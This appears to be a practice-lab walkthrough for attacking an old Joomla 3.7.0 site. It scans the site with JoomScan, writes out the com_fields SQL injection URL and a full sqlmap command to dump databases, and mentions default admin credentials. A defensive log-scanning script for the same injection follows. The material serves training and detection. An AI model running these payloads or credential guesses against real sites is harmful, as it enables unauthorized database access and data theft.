# Joomla CMS

<figure><img src="/files/DvDQxs2hAanWI2Qdk7ia" alt=""><figcaption></figcaption></figure>

Step 1: Go to the URL to access the lab (The URL may be different for each user).

<http://13.127.128.105/Vulnerable-CMS/Variant-3/>

Step 2: Download the OWASP JoomScan tool from this link.

Also, make sure you have installed Perl.

Step 3: Extract the files.

Step 4: Open the terminal or command prompt and type this command:

```
joomscan -u http://url
```

Press Enter.

Step 5: JoomScan will tell you that the Joomla version is 3.7.0. Search Google for “Joomla 3.7.0” exploit and you will come across the following exploit:

<https://www.exploit-db.com/exploits/42033>

Step 6: As you can see, it is an SQL injection exploit, and the exploit says that the vulnerable URL is:

URL Vulnerable: `http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27`

Step 7: Now replace <http://localhost> with the URL where Joomla is found in the practice lab, i.e. {url}.

So the complete URL becomes:

`{url}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27`

When you open this URL, you will see an SQL error, confirming the vulnerability.

Step 8: To exploit the SQL injection vulnerability, open sqlmap in a terminal or command prompt and copy the command (as given in the Exploit-DB exploit):

```
sqlmap -u "{url}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

Press Enter. (Make sure to enter your lab URL.)

Now proceed with the same approach to extract the database.

NOTE: Before doing all this, you could simply search for “Joomla default password” and you would learn that the default username is “admin” and the default password is “password”. These credentials work in the practice lab too, hence there are 2 vulnerabilities:

Using CMS with known vulnerability\
CMS with default password
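
For the defender's side of Steps 6 to 8, the following added example (not part of the original walkthrough or of any tool named in it) scans web server access-log lines for `com_fields` requests whose `list[fullordering]` value is not a plain sort key. The log lines are constructed samples, and the allow-list pattern for legitimate sort values is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate sort value is "column" or "column ASC|DESC".
SAFE_ORDERING = re.compile(r"^[A-Za-z0-9_.]+( (ASC|DESC))?$", re.IGNORECASE)
# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 2048
203.0.113.9 - - [10/Oct/2023:13:56:04 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000
203.0.113.12 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 2048
"""

def suspicious_ordering(target):
    """Return the decoded list[fullordering] value if it is not a plain sort key."""
    # parse_qs percent-decodes names and values, so list%5Bfullordering%5D is caught too.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_fields" not in query.get("option", []):
        return None
    for value in query.get("list[fullordering]", []):
        if not SAFE_ORDERING.match(value):
            return value
    return None

def scan(log_text):
    """Return (client_ip, decoded_value) for every flagged request in the log."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line in the expected format
        value = suspicious_ordering(match.group(2))
        if value is not None:
            hits.append((match.group(1), value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"ALERT {ip} sent list[fullordering]={value!r} to com_fields")
```

Access logs record only the query string, so a value sent in a POST body needs a WAF or application-level check instead.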

<figure><img src="/files/DcNV7BHVd5edHj4nnCNP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AaX5bKLM1n7BtFqEKca3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/d8ZiyKk3i2VOwlIWpyaP" alt=""><figcaption></figcaption></figure>

```
cd /usr/share/joomscan/  # (report)
```

<figure><img src="/files/XcYR0Xj1KoCRSNJjfrwD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NALZg1e8gkR8KUgCZqEK" alt=""><figcaption></figcaption></figure>

